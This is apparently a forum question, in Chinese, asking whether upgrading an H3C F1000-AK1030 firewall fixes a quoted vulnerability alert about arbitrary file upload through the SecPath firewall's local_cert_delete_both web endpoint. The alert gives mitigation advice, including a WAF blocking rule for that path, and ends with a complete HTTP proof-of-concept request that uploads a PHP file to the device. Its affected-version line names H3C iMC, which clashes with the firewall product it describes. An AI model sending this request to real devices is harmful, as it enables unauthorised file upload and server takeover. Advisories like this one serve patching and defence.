防火墙漏洞

设备是F1000-AK1030，升级到最新版本能解决以下问题吗？

【漏洞预警】H3C-SecPath下一代防火墙local_cert_delete_both存在任意文件上传

1.产品介绍：

     H3C SecPath防火墙面向行业市场的高性能多千兆和超万兆防火墙VPN集成网关产品，硬件上基于多核多线程MIPS/ARM处理器+ASIC硬件架构，为1U的独立盒式防火墙。该系列防火墙产品提供丰富的接口扩展能力，设备同时支持Telemetry和Netconf网络扩展协议，能够适应多种网络部署要求。作为NGFW产品，丰富的审计功能是必不可少的，所以产品系列可以扩展大容量硬盘，同时增加硬盘后还可以有效支持web缓冲等应用加速功能。

2.漏洞描述：

    H3C SecPath 下一代防火墙 存在任意文件上传漏洞，攻击者通过漏洞获取服务器权限。

3.影响版本：

H3C iMC产品

4.安全设备规则防护建议及修复建议：

（1）. 目前官方已发布漏洞修复补丁，及时联系厂商获取最新补丁进行升级：https://www.h3c.com/

（2）. 临时防护解决方案，在不影响业务的情况下配置URL访问控制策略，在WAF上添加拦截规则：POST请求，请求路径包含(local_cert_delete_both)

（3）. 限制访问来源地址，如非必要，不要将系统开放在互联网上。

（4）. 更新您的安全设备的规则库和软件版本，以确保能够有效防护新出现的威胁。

5. POC:

POST /webui/?g=local_cert_delete_both HTTP/1.1

Host: xx.xx.xx.xx

Accept-Encoding: identity

Content-Length: 345

Accept-Language: zh-CN,zh;q=0.8

Accept: */*

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info

Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3

Connection: keep-alive

Referer: http://www.baidu.com

Cache-Control: max-age=0

Content-Type: multipart/form-data; boundary=ed63f728755e4a2f90d094ec09b0ed9a

--ed63f728755e4a2f90d094ec09b0ed9a

Content-Disposition: form-data; name="submit_post"

local_cert_import

--ed63f728755e4a2f90d094ec09b0ed9a

Content-Disposition: form-data; name="key_file_name"; filename="QyFlQF.php"

Content-Type: text/plain

<?php echo md5('OmwiBdiyupqeAlMJ');@unlink(__file__);?>

--ed63f728755e4a2f90d094ec09b0ed9a--